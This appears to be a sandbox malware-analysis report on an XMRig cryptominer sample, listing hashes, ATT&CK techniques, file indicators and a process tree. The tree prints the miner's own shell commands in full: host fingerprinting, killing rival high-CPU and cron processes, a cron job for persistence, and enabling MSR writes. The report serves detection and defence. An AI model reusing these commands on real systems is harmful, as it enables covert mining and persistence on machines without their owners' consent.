xmrig | 1fcc2061f767574044ca1e97f92ca1d44ee0b35e0a796e3bd6a949ad4b1175e5

Analysis

max time kernel
56s
max time network
25s
platform
ubuntu-20.04_amd64
resource
ubuntu2004-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu2004-amd64-20240611-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
submitted
03-07-2024 03:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
Size

2.3MB
MD5

b9f096559e923787ebb1288c93ce2902
SHA1

94851bcc8f9c651bcda0ff33d17356cb0b16cf12
SHA256

1fcc2061f767574044ca1e97f92ca1d44ee0b35e0a796e3bd6a949ad4b1175e5
SHA512

ce5f09737d0b7191e3b646ed6111bb0ce97544d280223f327c4f4cc652dc840fed639bc0462b88a7f87d071066e302be7980f14faca1f5e6e9bf732637db22be
SSDEEP

49152:hjYpLCWvHFiMBiBFjrhrlzr18t7LxcAk4u7prrRQx:MvlNiPt9y7LxXk5prrA

Score

10^/10

xmrig antivm miner persistence

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
XMRig Miner payload 1 IoCs
miner

Processes:

resource yara_rule

behavioral1/memory/1402-1-0x00007faf43604000-0x00007faf43cc2d40-memory.dmp xmrig

resource	yara_rule
behavioral1/memory/1402-1-0x00007faf43604000-0x00007faf43cc2d40-memory.dmp	xmrig

Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

Processes:

-bash-55bb90b9-2429-4214-8c22-5d8ee0859237

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/virtual/dmi/id/product_name	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237

Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
persistence

Scheduled Task/Job
T1053

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.oCihMu crontab
Enumerates running processes
Discovers information about currently running processes on the system

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.oCihMu	crontab

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

T1082

Processes:

-bash-55bb90b9-2429-4214-8c22-5d8ee0859237

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/virtual/dmi/id/board_name	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/virtual/dmi/id/board_version	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/virtual/dmi/id/product_version	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237

Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

Virtualization/Sandbox Evasion
T1497

Processes:

-bash-55bb90b9-2429-4214-8c22-5d8ee0859237grepgrep

description ioc process

File opened for reading /proc/cpuinfo -bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading /proc/cpuinfo grep
File opened for reading /proc/cpuinfo grep

description	ioc	process
File opened for reading	/proc/cpuinfo	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/proc/cpuinfo	grep
File opened for reading	/proc/cpuinfo	grep

Reads CPU attributes 1 TTPs 7 IoCs

System Information Discovery

T1082

Processes:

ps-bash-55bb90b9-2429-4214-8c22-5d8ee0859237pspsps

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/system/cpu/types	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/system/cpu/possible	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Enumerates kernel/hardware configuration 1 TTPs 61 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

Processes:

-bash-55bb90b9-2429-4214-8c22-5d8ee0859237modprobe

description	ioc	process
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.mems	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/virtual/dmi/id	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/type	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/dax/devices/target_node	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/dax/target_node	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/firmware/dmi/tables/DMI	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/module/msr/initstate	modprobe
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/level	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/size	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/node/devices/node0/meminfo	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/node/devices/node0/hugepages	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/dax/devices	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/type	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/size	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/type	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/package_cpus	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/fs/cgroup/cpuset/cpuset.cpus	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_cpus	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/node/devices/node0/access1/initiators	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/core_id	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/type	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cpufreq/base_frequency	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/fs/cgroup/unified/cgroup.controllers	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/node/devices/node0/access0/initiators	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/size	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/level	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/devices/system/node/online	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/die_cpus	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/kernel/mm/hugepages	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_bandwidth	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/topology/physical_package_id	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/node/devices/node0/access0/initiators/read_latency	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index1/level	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/level	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for reading	/sys/bus/node/devices/node0/cpumap	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pspspsps

description	ioc	process
File opened for reading	/proc/13/status	ps
File opened for reading	/proc/645/status	ps
File opened for reading	/proc/565/cmdline	ps
File opened for reading	/proc/93/status	ps
File opened for reading	/proc/994/status	ps
File opened for reading	/proc/976/stat	ps
File opened for reading	/proc/1392/cmdline	ps
File opened for reading	/proc/1356/status	ps
File opened for reading	/proc/1370/cmdline	ps
File opened for reading	/proc/458/stat	ps
File opened for reading	/proc/1048/stat	ps
File opened for reading	/proc/1102/stat	ps
File opened for reading	/proc/24/stat	ps
File opened for reading	/proc/70/cmdline	ps
File opened for reading	/proc/18/cmdline	ps
File opened for reading	/proc/2/status	ps
File opened for reading	/proc/1132/status	ps
File opened for reading	/proc/461/stat	ps
File opened for reading	/proc/1334/cmdline	ps
File opened for reading	/proc/115/stat	ps
File opened for reading	/proc/765/cmdline	ps
File opened for reading	/proc/812/status	ps
File opened for reading	/proc/1130/stat	ps
File opened for reading	/proc/2/stat	ps
File opened for reading	/proc/1344/cmdline	ps
File opened for reading	/proc/88/status	ps
File opened for reading	/proc/1442/cmdline	ps
File opened for reading	/proc/85/status	ps
File opened for reading	/proc/170/status	ps
File opened for reading	/proc/1379/cmdline	ps
File opened for reading	/proc/5/status	ps
File opened for reading	/proc/1453/cmdline	ps
File opened for reading	/proc/1335/cmdline	ps
File opened for reading	/proc/17/stat	ps
File opened for reading	/proc/21/status	ps
File opened for reading	/proc/504/stat	ps
File opened for reading	/proc/1100/status	ps
File opened for reading	/proc/636/cmdline	ps
File opened for reading	/proc/459/stat	ps
File opened for reading	/proc/14/cmdline	ps
File opened for reading	/proc/22/stat	ps
File opened for reading	/proc/687/stat	ps
File opened for reading	/proc/159/status	ps
File opened for reading	/proc/645/cmdline	ps
File opened for reading	/proc/1132/status	ps
File opened for reading	/proc/88/stat	ps
File opened for reading	/proc/1026/status	ps
File opened for reading	/proc/uptime	ps
File opened for reading	/proc/90/stat	ps
File opened for reading	/proc/1337/cmdline	ps
File opened for reading	/proc/1457/stat	ps
File opened for reading	/proc/1082/status	ps
File opened for reading	/proc/20/status	ps
File opened for reading	/proc/885/stat	ps
File opened for reading	/proc/1338/stat	ps
File opened for reading	/proc/1123/stat	ps
File opened for reading	/proc/1083/cmdline	ps
File opened for reading	/proc/1026/stat	ps
File opened for reading	/proc/242/status	ps
File opened for reading	/proc/648/cmdline	ps
File opened for reading	/proc/70/stat	ps
File opened for reading	/proc/176/cmdline	ps
File opened for reading	/proc/1382/status	ps
File opened for reading	/proc/1130/status	ps

Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.

Processes:

-bash-55bb90b9-2429-4214-8c22-5d8ee0859237sh

description ioc process

File opened for modification /tmp/.lock -bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for modification /tmp/.cron sh

description	ioc	process
File opened for modification	/tmp/.lock	-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
File opened for modification	/tmp/.cron	sh

/tmp/-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
/tmp/-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
1⤵
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1402

/bin/sh
sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
2⤵
PID:1407

/usr/bin/hostname
hostname -I
3⤵
PID:1410

/usr/bin/awk
awk "{print \$1}"
3⤵
PID:1412

/usr/bin/cat
cat /etc/ssh/sshd_config
3⤵
PID:1414

/usr/bin/grep
grep "Port "
3⤵
PID:1415

/usr/bin/head
head -n 1
3⤵
PID:1416

/usr/bin/awk
awk "{print \"-\"\$2}"
3⤵
PID:1417

/usr/bin/whoami
whoami
3⤵
PID:1418

/usr/bin/hostname
hostname
3⤵
PID:1419

/usr/bin/grep
grep -c "^processor" /proc/cpuinfo
3⤵
- Checks CPU configuration
PID:1420

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
3⤵
- Checks CPU configuration
PID:1425

/usr/bin/cut
cut -d: -f2
3⤵
PID:1426

/usr/bin/sed
sed -e "s/^ *//"
3⤵
PID:1427

/usr/bin/sed
sed -e "s/\$//"
3⤵
PID:1429

/usr/bin/awk
awk "{print \$1}"
3⤵
PID:1435

/usr/bin/awk
awk "{print \$4}"
3⤵
PID:1438

/usr/bin/awk
awk "{print \$4}"
3⤵
PID:1441

/bin/sh
sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
2⤵
PID:1442

/usr/bin/awk
awk "/[zZ]/ && !a[\$2]++ {print \$2}"
3⤵
PID:1444

/usr/bin/ps
ps -A "-ostat,ppid"
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:1443

/usr/bin/id
id -u
3⤵
PID:1446

/usr/bin/grep
grep -v grep
3⤵
PID:1449

/usr/bin/grep
grep /etc/cron
3⤵
PID:1448

/usr/bin/ps
ps x
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:1447

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
2⤵
PID:1451

/usr/bin/id
id -u
3⤵
PID:1452

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
3⤵
PID:1457

/usr/bin/grep
grep -v /usr/sbin/httpd
3⤵
PID:1456

/usr/bin/grep
grep -v -- "-bash[[:space:]]*\$"
3⤵
PID:1455

/usr/bin/grep
grep -v grep
3⤵
PID:1454

/usr/bin/ps
ps aux
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:1453

/bin/sh
sh -c "dir=`pwd 2>/dev/null`;rm -rf \$dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/-bash-55bb90b9-2429-4214-8c22-5d8ee0859237' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '\$dir/'/tmp/-bash-55bb90b9-2429-4214-8c22-5d8ee0859237' >> .cron 2>/dev/null; if [ \$(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/-bash-55bb90b9-2429-4214-8c22-5d8ee0859237\$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab \$dir/.cron 2>/dev/null; fi;rm -rf \$dir/.cron 2>/dev/null"
2⤵
- Writes file to tmp directory
PID:1459

/usr/bin/rm
rm -rf /tmp/.cron
3⤵
PID:1461

/usr/bin/grep
grep -v grep
3⤵
PID:1463

/usr/bin/crontab
crontab -l
3⤵
PID:1462

/usr/bin/grep
grep -v /tmp/-bash-55bb90b9-2429-4214-8c22-5d8ee0859237
3⤵
PID:1464

/usr/bin/grep
grep "/tmp/-bash-55bb90b9-2429-4214-8c22-5d8ee0859237\$"
3⤵
PID:1468

/usr/bin/sort
sort
3⤵
PID:1469

/usr/bin/uniq
uniq
3⤵
PID:1470

/usr/bin/grep
grep -v grep
3⤵
PID:1467

/usr/bin/crontab
crontab -l
3⤵
PID:1466

/usr/bin/wc
wc -l
3⤵
PID:1471

/usr/bin/crontab
crontab /tmp/.cron
3⤵
- Creates/modifies Cron job
PID:1472

/usr/bin/rm
rm -rf /tmp/.cron
3⤵
PID:1473

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
2⤵
PID:1474

/usr/bin/id
id -u
3⤵
PID:1475

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
3⤵
PID:1480

/usr/bin/grep
grep -- "-bash[[:space:]]*\$"
3⤵
PID:1479

/usr/bin/wc
wc -l
3⤵
PID:1481

/usr/bin/grep
grep -v grep
3⤵
PID:1478

/usr/bin/ps
ps aux
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:1477

/bin/sh
sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"
2⤵
PID:1524

/sbin/modprobe
/sbin/modprobe msr "allow_writes=on"
3⤵
- Enumerates kernel/hardware configuration
PID:1525

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/.cron
Filesize
63B

MD5
7d54d1560c6fd7816f8c66f2eaa4bbfb

SHA1
8b745ad152c42c7e8bb5680a65430e2c432e7125

SHA256
6a4889b152f843a609b03a59eecdcd2ba3786fc1ccb6da80f2f0631f1fbc2515

SHA512
b3d2aa11dc1def8a68eceed2ff49ab94aa0ae4a44380d50876e2fda4030d79fb0bc5a59adb515466ed5e2d15d3f5d5f063df02bfab414a44be9c94291d34357e

Download Submit
/var/spool/cron/crontabs/tmp.oCihMu
Filesize
247B

MD5
3589d2bb6bc055c39c7c8eda7ad09f00

SHA1
f9c5877b4caf114de6c9ea296242bad3b80625f0

SHA256
f4307f4448290cca325e82ea1895710d04ec7e80926a3ce9aa8c3f6b6eebb459

SHA512
9aafe66663b3eb3c8ed1306e65c835974fcb31966b48725853abac07c6ff45435415625877413ca5ed896c87840993016b77430e4f4a7ad8a40d5b4e0e80e8f5

Download Submit
memory/1402-1-0x00007faf43604000-0x00007faf43cc2d40-memory.dmp

Download